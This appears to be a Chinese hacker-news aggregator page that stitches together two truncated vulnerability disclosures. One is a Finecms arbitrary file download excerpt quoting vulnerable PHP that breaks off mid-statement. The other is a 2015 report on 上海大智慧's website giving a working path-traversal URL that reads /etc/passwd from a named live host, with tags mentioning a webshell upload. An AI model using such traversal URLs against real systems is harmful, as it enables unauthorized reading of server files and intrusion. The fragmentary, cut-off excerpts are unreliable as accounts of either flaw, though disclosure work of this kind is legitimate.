记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华Finecms 任意文件下载
Author:Sinner
漏洞文件:
controllersApiController.php Line 54
public function downAction() {
$data = fn_authcode(base64_decode($this->get('file')), 'DECODE');
$file = isset($data['finecms']) && $data['finecms'] ? $data['finecms'] : '';
if (empty($file)) {
$this->msg(lang('a-mod-213'));
}
if (
上海大智慧某网站任意文件下载到系统权限
漏洞标题
上海大智慧某网站任意文件下载到系统权限
相关厂商
上海大智慧
漏洞作者
Tea
提交时间
2015-04-05 22:51
公开时间
2015-05-22 13:12
漏洞类型
任意文件遍历/下载
危害等级
高
自评Rank
20
漏洞状态
厂商已经确认
Tags标签
漏洞详情
任意文件下载:
http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/passwd&name=c
或者:
http://pub.px.gw.com.cn/training/down
发布时间:2015-05-23 05:35 |
阅读:122991 | 评论:0 |
标签:漏洞 /etc/passwd 上传WEBSHELL 上海大智慧 任意文件下载 任意文件遍历 敏感信息未加密存储 用户敏感
公告
九层之台,起于累土;黑客之术,始于阅读